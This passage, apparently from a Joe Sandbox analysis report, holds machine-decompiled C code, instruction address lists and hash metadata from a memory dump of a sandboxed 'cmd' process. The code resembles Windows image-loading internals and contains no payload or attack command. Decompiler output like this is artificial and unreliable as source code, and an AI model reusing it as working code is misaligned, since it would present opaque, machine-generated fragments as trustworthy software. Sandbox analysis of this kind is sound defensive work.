													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E036D6600(0x37b52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E036D7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x37bb239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E0374E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x37b8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x37bb218; // 0x0
														asm("ror edi, cl");
														 *0x37bb1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E036E2280(_t250, 0x37b84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L03703898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E036DFFB0(_t293, _t353, 0x37b84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E037037F5(_t353, 0);
																}
																E03700413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E036F9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E036F02D6(_t174);
																}
																L036E77F0( *0x37b7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E036FC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L036DEC7F(_t353);
										L036F19B8(_t287, 0, _t353, 0);
										_t200 = E036CF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E0370B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x37bb2f8; // 0xc80000
									if((_t206 |  *0x37bb2fc) == 0 || ( *0x37bb2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x37bb2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E03776B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E03776AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E036DE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L036DEAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E03709730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E036DE9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L036D8F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E03703C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x036dd5f2
0x036dd5f5
0x036dd5f5
0x036dd5fd
0x036dd600
0x036dd60a
0x036dd60d
0x036dd617
0x036dd61d
0x036dd627
0x036dd62e
0x036dd911
0x036dd913
0x00000000
0x036dd919
0x036dd919
0x036dd919
0x036dd634
0x036dd634
0x036dd634
0x036dd634
0x036dd640
0x036dd8bf
0x00000000
0x036dd646
0x036dd646
0x036dd64d
0x036dd652
0x0372b2fc
0x0372b2fc
0x0372b302
0x0372b33b
0x0372b341
0x00000000
0x0372b304
0x0372b304
0x0372b319
0x0372b31e
0x0372b324
0x0372b326
0x0372b332
0x0372b347
0x0372b34c
0x0372b351
0x0372b35a
0x00000000
0x0372b328
0x0372b328
0x00000000
0x0372b328
0x0372b326
0x036dd658
0x036dd658
0x036dd65b
0x036dd665
0x00000000
0x036dd66b
0x036dd66b
0x036dd66b
0x036dd66b
0x036dd66d
0x036dd672
0x036dd67a
0x00000000
0x00000000
0x036dd680
0x036dd686
0x036dd8ce
0x036dd8d4
0x036dd8dd
0x036dd8e0
0x036dd68c
0x036dd691
0x036dd69d
0x036dd6a2
0x036dd6a7
0x036dd6b0
0x036dd6b5
0x036dd6e0
0x036dd6b7
0x036dd6b7
0x036dd6b9
0x036dd6b9
0x036dd6bb
0x036dd6bd
0x036dd6ce
0x036dd6d0
0x036dd6d2
0x0372b363
0x0372b365
0x00000000
0x0372b36b
0x00000000
0x0372b36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x036dd6bf
0x036dd6bf
0x036dd6e5
0x036dd6e7
0x036dd6e9
0x036dd6ec
0x036dd6ec
0x036dd6ef
0x036dd6f5
0x036dd6f9
0x036dd6fb
0x036dd6fd
0x036dd701
0x036dd703
0x036dd70a
0x036dd70a
0x036dd701
0x036dd710
0x036dd710
0x036dd6c1
0x036dd6c1
0x036dd6c6
0x0372b36d
0x0372b36f
0x00000000
0x0372b375
0x0372b375
0x0372b375
0x00000000
0x0372b375
0x00000000
0x036dd6cc
0x036dd6d8
0x036dd6d8
0x036dd6d8
0x00000000
0x036dd6c6
0x036dd6bf
0x00000000
0x036dd6da
0x036dd6da
0x036dd716
0x036dd71b
0x036dd720
0x036dd726
0x036dd726
0x036dd72d
0x00000000
0x036dd733
0x036dd739
0x036dd742
0x036dd750
0x036dd758
0x036dd764
0x036dd776
0x036dd77a
0x036dd783
0x036dd928
0x036dd92c
0x036dd93d
0x036dd944
0x036dd94f
0x036dd954
0x036dd956
0x036dd95f
0x036dd961
0x036dd973
0x036dd973
0x036dd956
0x036dd944
0x036dd92c
0x036dd78b
0x0372b394
0x036dd791
0x036dd798
0x0372b3a3
0x0372b3bb
0x0372b3bb
0x036dd7a5
0x036dd866
0x036dd870
0x036dd884
0x036dd892
0x036dd898
0x036dd89e
0x036dd8a0
0x036dd8a6
0x036dd8ac
0x036dd8ae
0x036dd8b4
0x036dd8b4
0x036dd8ae
0x036dd7a5
0x036dd78b
0x036dd7b1
0x0372b3c5
0x0372b3c5
0x036dd7c3
0x036dd7ca
0x036dd7e5
0x036dd7eb
0x036dd8eb
0x036dd8ed
0x00000000
0x036dd8f3
0x036dd8f3
0x036dd8f3
0x00000000
0x036dd8ed
0x036dd7cc
0x036dd7cc
0x036dd7d2
0x00000000
0x036dd7d4
0x036dd7d4
0x036dd7d7
0x036dd7df
0x0372b3d4
0x0372b3d9
0x0372b3dc
0x0372b3dc
0x0372b3df
0x0372b3e2
0x0372b468
0x0372b46d
0x0372b46f
0x0372b46f
0x0372b475
0x036dd8f8
0x036dd8f9
0x036dd8fd
0x0372b3e8
0x0372b3e8
0x0372b3eb
0x0372b3ed
0x00000000
0x0372b3ef
0x0372b3ef
0x0372b3f1
0x0372b3f4
0x0372b3fe
0x0372b404
0x0372b409
0x0372b40e
0x0372b410
0x0372b410
0x0372b414
0x0372b414
0x0372b41b
0x0372b420
0x0372b423
0x0372b425
0x0372b427
0x0372b42a
0x0372b42d
0x0372b42d
0x0372b42a
0x0372b432
0x0372b436
0x0372b438
0x0372b43b
0x0372b43b
0x0372b449
0x0372b44e
0x0372b454
0x0372b458
0x0372b458
0x0372b45d
0x00000000
0x0372b45d
0x0372b3ed
0x00000000
0x00000000
0x00000000
0x036dd7df
0x036dd7d2
0x036dd7ca
0x0372b37c
0x0372b37e
0x0372b385
0x0372b38a
0x00000000
0x0372b38a
0x036dd742
0x036dd7f1
0x036dd7f8
0x0372b49b
0x0372b49b
0x036dd800
0x036dd837
0x036dd843
0x036dd845
0x036dd847
0x036dd84a
0x036dd84b
0x036dd84e
0x036dd857
0x036dd802
0x036dd802
0x036dd80d
0x00000000
0x036dd818
0x036dd818
0x036dd824
0x036dd831
0x0372b4a5
0x0372b4ab
0x0372b4b3
0x0372b4b8
0x0372b4bb
0x00000000
0x0372b4c1
0x0372b4c1
0x0372b4c8
0x00000000
0x0372b4ce
0x0372b4d4
0x0372b4e1
0x0372b4e3
0x0372b4e5
0x00000000
0x0372b4eb
0x0372b4f0
0x0372b4f2
0x036ddac9
0x036ddacc
0x036ddacf
0x036ddad1
0x036ddd78
0x036ddd78
0x036ddcf2
0x00000000
0x036ddad7
0x036ddad9
0x036ddadb
0x00000000
0x00000000
0x036ddae1
0x036ddae1
0x036ddae4
0x036ddae6
0x0372b4f9
0x0372b4f9
0x0372b500
0x036ddaec
0x036ddaec
0x036ddaf5
0x036ddaf8
0x036ddafb
0x036ddb03
0x036ddb11
0x036ddb16
0x036ddb19
0x036ddb1b
0x0372b52c
0x0372b531
0x0372b534
0x036ddb21
0x036ddb21
0x036ddb24
0x036ddcd9
0x036ddce2
0x036ddce5
0x036ddd6a
0x036ddd6d
0x00000000
0x036ddd73
0x0372b51a
0x0372b51c
0x0372b51f
0x0372b524
0x00000000
0x0372b524
0x036ddce7
0x036ddce7
0x036ddce7
0x00000000
0x036ddce7
0x00000000
0x036ddb2a
0x036ddb2c
0x036ddb31
0x036ddb33
0x036ddb36
0x036ddb39
0x036ddb3b
0x036ddb66
0x036ddb66
0x036ddb3d
0x036ddb3d
0x036ddb3e
0x036ddb46
0x036ddb47
0x036ddb49
0x036ddb4c
0x036ddb53
0x036ddb55
0x036ddb58
0x036ddb5a
0x0372b50a
0x0372b50f
0x0372b512
0x036ddb60
0x036ddb60
0x036ddb63
0x036ddb63
0x00000000
0x036ddb63
0x036ddb5a
0x036ddb3b
0x036ddb24
0x036ddb69
0x036ddb69
0x036ddb6c
0x036ddb6f
0x036ddb74
0x0372b557
0x0372b557
0x0372b55e
0x036ddb7a
0x036ddb7c
0x036ddb7f
0x036ddb82
0x036ddb85
0x00000000
0x036ddb8b
0x036ddb8b
0x036ddb8d
0x036ddb9b
0x036ddb9b
0x036ddb9d
0x036ddba0
0x036ddba2
0x036ddba4
0x036ddba7
0x036ddba9
0x036ddbae
0x036ddbae
0x036ddbb1
0x036ddbb4
0x036ddbb4
0x036ddbb7
0x036ddbba
0x036ddcd2
0x036ddcd4
0x00000000
0x036ddbc0
0x036ddbc0
0x036ddbd2
0x036ddbd7
0x036ddbda
0x036ddbdd
0x036ddbdf
0x00000000
0x036ddbe5
0x036ddbe5
0x036ddbee
0x036ddbf1
0x0372b541
0x0372b544
0x00000000
0x0372b546
0x0372b546
0x00000000
0x0372b546
0x036ddbf7
0x036ddbf7
0x036ddbfd
0x036ddbfd
0x036ddbff
0x036ddc0b
0x036ddc15
0x036ddc1b
0x036ddc1d
0x036ddc21
0x036ddc21
0x036ddc23
0x036ddc23
0x036ddc26
0x036ddc29
0x036ddc2b
0x00000000
0x00000000
0x036ddc31
0x036ddc34
0x036ddc36
0x036ddcbf
0x036ddcbf
0x036ddcc2
0x00000000
0x036ddc3c
0x036ddc41
0x036ddc43
0x00000000
0x036ddc45
0x036ddc45
0x036ddc47
0x00000000
0x036ddc4d
0x036ddc4d
0x036ddc50
0x036ddc52
0x036ddc55
0x036ddcfa
0x036ddcfe
0x036ddd08
0x036ddd0a
0x036ddd0c
0x00000000
0x036ddd12
0x036ddd15
0x036ddd2d
0x036ddd2f
0x036ddd32
0x036ddd35
0x00000000
0x036ddd35
0x036ddc5b
0x036ddc5b
0x036ddc5e
0x036ddc61
0x036ddc64
0x036ddc67
0x036ddc67
0x036ddc6a
0x036ddc6c
0x036ddc8e
0x036ddc8e
0x036ddc91
0x036ddc93
0x036ddcce
0x036ddcce
0x036ddc95
0x036ddc9c
0x036ddc6e
0x036ddc72
0x036ddc75
0x036ddc77
0x036ddc79
0x0372b551
0x0372b551
0x00000000
0x036ddc7f
0x036ddc7f
0x036ddc81
0x00000000
0x036ddc83
0x036ddc86
0x036ddc88
0x00000000
0x00000000
0x00000000
0x00000000
0x036ddc88
0x036ddc81
0x036ddc79
0x036ddc6c
0x036ddc55
0x036ddc47
0x036ddc43
0x00000000
0x036ddc36
0x036ddc23
0x00000000
0x036ddbff
0x036ddbf1
0x036ddbdf
0x036ddb8f
0x036ddb92
0x036ddb95
0x00000000
0x00000000
0x00000000
0x00000000
0x036ddb95
0x036ddb8d
0x036ddb85
0x036ddb74
0x036ddc9f
0x036ddca2
0x036ddcb0
0x036ddcb0
0x036ddad1
0x0372b4e5
0x0372b4c8
0x00000000
0x00000000
0x00000000
0x036dd831
0x036dd80d
0x00000000
0x036dd800
0x0372b47f
0x0372b485
0x00000000
0x0372b485
0x036dd665
0x036dd652
0x00000000

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: efc5a8516575dc70b3f166aec382638b30dc9085f18f70793fd22c5f4248c1b1
Instruction ID: 8609c761d5a6567ea66fed65c88034e1c5e1cdc8796ba13e0152d14324d9466b
Opcode Fuzzy Hash: efc5a8516575dc70b3f166aec382638b30dc9085f18f70793fd22c5f4248c1b1
Instruction Fuzzy Hash: DAE1C134E00359CFDB24EF28C984BA9B7B6BF45304F0841E9D9099B391D774A985CF91

Uniqueness

Uniqueness Score: -1.00%

Function 036D849B Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E036D849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x379f9c0);
				E0371D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x37b7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E036DCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E036E2280( *[fs:0x30], 0x37b8550);
						_t139 =  *0x37b7b04; // 0x2
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E036FF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E036DFFB0(_t193, _t235, 0x37b8550);
								L5:
								return E0371D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E036C1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x37b7b9c; // 0x0
							_t235 = L036E4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x37b7b10; // 0x8
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E036FA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E036DFFB0(_t193, _t235, 0x37b8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L036E77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L036E77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x37b7b04; // 0x2
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x37b7b10; // 0x8
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E037037C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x37b7b9c; // 0x0
									_t214 = L036E4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E037037F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x37b7b10 =  *0x37b7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x37b7b04 =  *0x37b7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L036E77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L036E77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x37b7b08 =  *0x37b7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E037057C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0370F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L036E77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E036FA44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L036E77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
